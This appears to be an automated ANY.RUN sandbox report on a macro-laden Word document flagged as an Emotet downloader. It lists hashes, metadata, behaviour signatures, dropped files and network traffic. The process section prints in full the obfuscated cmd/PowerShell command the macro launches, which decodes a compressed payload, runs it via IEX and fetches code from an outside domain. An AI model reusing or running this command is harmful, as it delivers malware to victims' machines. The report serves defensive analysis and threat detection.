analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

O2_13_11_18.doc

Full analysis: https://app.any.run/tasks/ce1d0ca7-ff9a-4959-82aa-6d6af3fe5661
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 15, 2018, 11:43:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Alex-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 06:28:00 2018, Last Saved Time/Date: Tue Nov 13 06:28:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

33E444EC80B4A36F67E5B669DCC83F52

SHA1:

3F27E4DA792409C746A5AAD013B01E94083E2DE1

SHA256:

E9556E3634058EF2F2D958528AF2CB8B7F4DD64E4B531FEBE70EFFEDDF80F78B

SSDEEP:

1536:9iocn1kp59gxBK85fBt+a9dNPlC3lpmSrfFm34dINPlC3lpT1wZ2tR9C1s5KF9FY:R41k/W48XNPlC3lpmSrfFm34dINPlC3J

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3656)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3452)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3452)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3444)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3656)
    • Starts CMD.EXE for commands execution

      • CMD.exe (PID: 2776)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3452)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3452)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:13 06:28:00
CreateDate: 2018:11:13 06:28:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Alex-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3452"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\O2_13_11_18.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2776CMD /c cmD /C "SET oxue= [STRiNG]::joIn('',([reGEx]::MAtches( ")''NIOJ-]52,62,4[cEpSmoc:VNE$ ( ^&^| )63]rAhC[,'5IU' ECAlperc- 421]rAhC[,)94]rAhC[+25]rAhC[+05]rAhC[( ECAlperc- 93]rAhC[,'RM3' ecALpER-)') }) (dn'+'eOTDA'+'Er._'+'5IU{TCeJ'+'BO-H'+'C'+'aer'+'OF 142 }) iIcS'+'A::]GNidocnE.'+'t'+'xeT.mEtS'+'Ys[,'+' '+'_5IU '+'(rEdAeRmAe'+'Rts.OI.METsyS tc'+'eJB'+'o'+'-Wen {tCeJBo-'+'HCaE'+'rO'+'F 142'+')sSErp'+'MOcE'+'D:'+':'+']edOMNOisS'+'ERPmoC'+'.nOIS'+'SeRPM'+'oC.OI'+'[ '+',) R'+'M3'+'=Mg+'+'0'+'FP7'+'kF9krOl3KPaZ'+'pv3L'+'Qa'+'d'+'H'+'MU7QF25k'+'z'+'tw'+'hd2cXHJ'+'o7'+'pkYH1'+'H5wlOy'+'wv'+'P'+'vs'+'XMz'+'4'+'rB2'+'Ob'+'AEm'+'W56Bwe'+'R'+'Ez'+'35HPg'+'vjmI4R'+'6'+'CB'+'Yu'+'m'+'7WV'+'c8'+'ew5vM'+'roz'+'9'+'P'+'HLU5/IgR7Ni4j'+'bq0KvZJ'+'/s6j1+n'+'lkP9'+'9fBR'+'ELkDpD'+'l'+'cTN'+'6AeZl'+'cEqof'+'bHA'+'SmIaTx'+'FW63'+'u8W'+'iNz2YM'+'h1r'+'W0cyRt0yvN1'+'MsBm7GJshtF'+'a41wi'+'a'+'gO+'+'sc'+'k/'+'/g3mP'+'7'+'J/D6'+'Q'+'TqsBcsaFpv'+'Ee'+'IkR5oi'+'no'+'b'+'LsR'+'dx'+'iEE3'+'loyLI'+'O'+'Q'+'vW'+'G'+'D'+'a'+'Uu'+'jd'+'BY'+'RWKY'+'25ZI'+'e9ZOHLjtt'+'u/v0W'+'u9'+'p'+'mN'+'pNuN'+'5'+'U'+'zSGvBFR'+'QEZ'+'x'+'X'+'xK0'+'wR'+'A'+'Beb'+'m'+'aa'+'C4'+'hy/bIE'+'xMwS'+'N'+'B'+'ZNRM'+'3'+' (g'+'nI'+'r'+'Ts46esABM'+'oRF::]tREVN'+'O'+'c'+'[ '+']M'+'aErtSy'+'RoMe'+'m'+'.'+'OI[(M'+'aErTsETal'+'feD.nOI'+'s'+'SEr'+'pm'+'Oc.'+'oi.m'+'etsY'+'S '+'tceJBo-'+'W'+'en()R'+'M3xRM'+'3'+'+]4'+'3[EMoHsp5IU+'+']4[EMoh'+'s'+'P'+'5IU ( ^& '((" ,'.', 'RIgHTtOleft') ^|foReACH-ObJECT { $_.vALUe}) ) ^| . ( $ENV:COmspec[4,24,25]-jOin'')&& PoWeRsHeLL ( .( \"{0}{1}\"-f'G','cI' ) (\"{0}{1}\" -f'EnV:oxU','e' ) ).\"V`ALUe\" ^| . ( \"{0}{1}\" -f 'I','Ex')" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3444cmD /C "SET oxue= [STRiNG]::joIn('',([reGEx]::MAtches( ")''NIOJ-]52,62,4[cEpSmoc:VNE$ ( &| )63]rAhC[,'5IU' ECAlperc- 421]rAhC[,)94]rAhC[+25]rAhC[+05]rAhC[( ECAlperc- 93]rAhC[,'RM3' ecALpER-)') }) (dn'+'eOTDA'+'Er._'+'5IU{TCeJ'+'BO-H'+'C'+'aer'+'OF 142 }) iIcS'+'A::]GNidocnE.'+'t'+'xeT.mEtS'+'Ys[,'+' '+'_5IU '+'(rEdAeRmAe'+'Rts.OI.METsyS tc'+'eJB'+'o'+'-Wen {tCeJBo-'+'HCaE'+'rO'+'F 142'+')sSErp'+'MOcE'+'D:'+':'+']edOMNOisS'+'ERPmoC'+'.nOIS'+'SeRPM'+'oC.OI'+'[ '+',) R'+'M3'+'=Mg+'+'0'+'FP7'+'kF9krOl3KPaZ'+'pv3L'+'Qa'+'d'+'H'+'MU7QF25k'+'z'+'tw'+'hd2cXHJ'+'o7'+'pkYH1'+'H5wlOy'+'wv'+'P'+'vs'+'XMz'+'4'+'rB2'+'Ob'+'AEm'+'W56Bwe'+'R'+'Ez'+'35HPg'+'vjmI4R'+'6'+'CB'+'Yu'+'m'+'7WV'+'c8'+'ew5vM'+'roz'+'9'+'P'+'HLU5/IgR7Ni4j'+'bq0KvZJ'+'/s6j1+n'+'lkP9'+'9fBR'+'ELkDpD'+'l'+'cTN'+'6AeZl'+'cEqof'+'bHA'+'SmIaTx'+'FW63'+'u8W'+'iNz2YM'+'h1r'+'W0cyRt0yvN1'+'MsBm7GJshtF'+'a41wi'+'a'+'gO+'+'sc'+'k/'+'/g3mP'+'7'+'J/D6'+'Q'+'TqsBcsaFpv'+'Ee'+'IkR5oi'+'no'+'b'+'LsR'+'dx'+'iEE3'+'loyLI'+'O'+'Q'+'vW'+'G'+'D'+'a'+'Uu'+'jd'+'BY'+'RWKY'+'25ZI'+'e9ZOHLjtt'+'u/v0W'+'u9'+'p'+'mN'+'pNuN'+'5'+'U'+'zSGvBFR'+'QEZ'+'x'+'X'+'xK0'+'wR'+'A'+'Beb'+'m'+'aa'+'C4'+'hy/bIE'+'xMwS'+'N'+'B'+'ZNRM'+'3'+' (g'+'nI'+'r'+'Ts46esABM'+'oRF::]tREVN'+'O'+'c'+'[ '+']M'+'aErtSy'+'RoMe'+'m'+'.'+'OI[(M'+'aErTsETal'+'feD.nOI'+'s'+'SEr'+'pm'+'Oc.'+'oi.m'+'etsY'+'S '+'tceJBo-'+'W'+'en()R'+'M3xRM'+'3'+'+]4'+'3[EMoHsp5IU+'+']4[EMoh'+'s'+'P'+'5IU ( & '((" ,'.', 'RIgHTtOleft') ^|foReACH-ObJECT { $_.vALUe}) ) ^| . ( $ENV:COmspec[4,24,25]-jOin'')&& PoWeRsHeLL ( .( \"{0}{1}\"-f'G','cI' ) (\"{0}{1}\" -f'EnV:oxU','e' ) ).\"V`ALUe\" ^| . ( \"{0}{1}\" -f 'I','Ex')"C:\Windows\system32\cmd.exeCMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3656PoWeRsHeLL ( .( \"{0}{1}\"-f'G','cI' ) (\"{0}{1}\" -f'EnV:oxU','e' ) ).\"V`ALUe\" | . ( \"{0}{1}\" -f 'I','Ex')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 393
Read events
997
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3452WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8A14.tmp.cvr
MD5:
SHA256:
3656powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4A8IRHROB40RN0XT1RCE.temp
MD5:
SHA256:
3452WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:80774D9A106B936A7BB758492C8E8CA0
SHA256:8F2E28C4DB31D514D1CD5EF5D64A6D76C2BEE3FBB21D1BCBE09EFF52C60F80C8
3656powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16939a.TMPbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3656powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3452WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_13_11_18.docpgc
MD5:73E5142C73E1D6C3AD97247353ACCFAA
SHA256:3E7AC7D47128772020D69D04612E8210EC5DB8C86893D7184AA1CCBF3483D87C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3656
powershell.exe
GET
104.198.58.34:80
http://therogers.foundation/ZFFmp6/
US
whitelisted
3656
powershell.exe
GET
301
104.198.58.34:80
http://therogers.foundation/ZFFmp6
US
html
178 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3656
powershell.exe
104.198.58.34:80
therogers.foundation
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
therogers.foundation
  • 104.198.58.34
whitelisted

Threats

PID
Process
Class
Message
3656
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
No debug info